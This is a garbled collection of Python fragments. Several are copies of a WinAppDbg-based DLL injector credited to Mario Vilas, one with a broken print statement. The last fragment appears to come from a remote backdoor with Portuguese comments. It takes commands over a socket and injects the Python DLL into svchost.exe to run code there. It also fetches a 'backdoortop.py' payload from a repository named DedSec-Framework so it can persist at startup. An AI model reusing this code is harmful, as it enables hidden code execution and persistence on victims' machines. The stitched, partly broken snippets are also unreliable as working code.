def load_dll( pid, filename ): # Instance a Process object. process = Process( pid ) # Load the DLL library in the process. process.inject_dll( filename )
def load_dll(pid, filename): # Instance a Process object. process = Process(pid) # Load the DLL library in the process. process.inject_dll(filename)
def main(): print "Process DLL injector" print "by Mario Vilas (mvilas at gmail.com)" print if len(sys.argv) != 3: script = os.path.basename(sys.argv[0]) print "Injects a DLL into a running process." print " %s <pid> <library.dll>" % script print " %s <process.exe> <library.dll>" % script return System.request_debug_privileges() try: pid = HexInput.integer(sys.argv[1]) except Exception: s = System() s.scan_processes() pl = s.find_processes_by_filename(sys.argv[1]) if not pl: print "Process not found: %s" % sys.argv[1] return if len(pl) > 1: print "Multiple processes found for %s" % sys.argv[1] for p,n in pl: print "\t%12d: %s" % (p,n) return pid = pl[0][0].get_pid() print "Using PID %d (0x%x)" % (pid, pid) dll = sys.argv[2] print "Using DLL %s" % dll p = Process(pid) b = p.get_bits() if b != System.bits: print ( "Cannot inject into a %d bit process from a %d bit Python VM!" % (b, System.bits) ) return p.scan_modules() p.inject_dll(dll)
def main(): print("Process DLL injector") print("by Mario Vilas (mvilas at gmail.com)") print if len(sys.argv) != 3: script = os.path.basename(sys.argv[0]) print("Injects a DLL into a running process.") print(" %s <pid> <library.dll>" % script) print(" %s <process.exe> <library.dll>" % script) return System.request_debug_privileges() try: pid = HexInput.integer(sys.argv[1]) except Exception: s = System() s.scan_processes() pl = s.find_processes_by_filename(sys.argv[1]) if not pl: print("Process not found: %s" % sys.argv[1]) return if len(pl) > 1: print("Multiple processes found for %s" % sys.argv[1]) for p,n in pl: print("\t%12d: %s" % (p,n)) return pid = pl[0][0].get_pid() print("Using PID %d (0x%x)" % (pid, pid)) dll = sys.argv[2] print("Using DLL %s" % dll) p = Process(pid) b = p.get_bits() if b != System.bits: print(() "Cannot inject into a %d bit process from a %d bit Python VM!" % (b, System.bits) ) return p.scan_modules() p.inject_dll(dll)
def load_dll(pid, filename): process = Process(pid) process.inject_dll(filename)
if dados.startswith("pwd"): s.send("\n"+str(os.getcwd)+"\n") if os.name == 'nt': try: # Injetando codigo python_lib = "python{0}{1}.dll".format(sys.version_info.major, sys.version_info.minor) python_dll = ctypes.util.find_library(python_lib) s = System() s.scan_processes() pl = s.find_processes_by_filename("svchost.exe") pid = pl[0][0].get_pid() p = Process(pid) print('pid', pid) print('arch', p.get_bits()) t = p.inject_dll(python_dll) p.scan_modules() m = p.get_module_by_name(python_lib) init = m.resolve("Py_InitializeEx") pyrun = m.resolve("PyRun_SimpleString") print(init, pyrun) p.start_thread(init, 0) time.sleep(0.1) sh = 'import subprocess; subprocess.call("svchost.exe")' addr = p.malloc(len(sh)) p.write(addr, sh) p.start_thread(pyrun, addr) # Movendo o backdoor pro startup if dados.startswith("move_startup"): url = "https://raw.githubusercontent.com/DedSec-F0x/DedSec-Framework/master/exploit/python/backdoortop.py"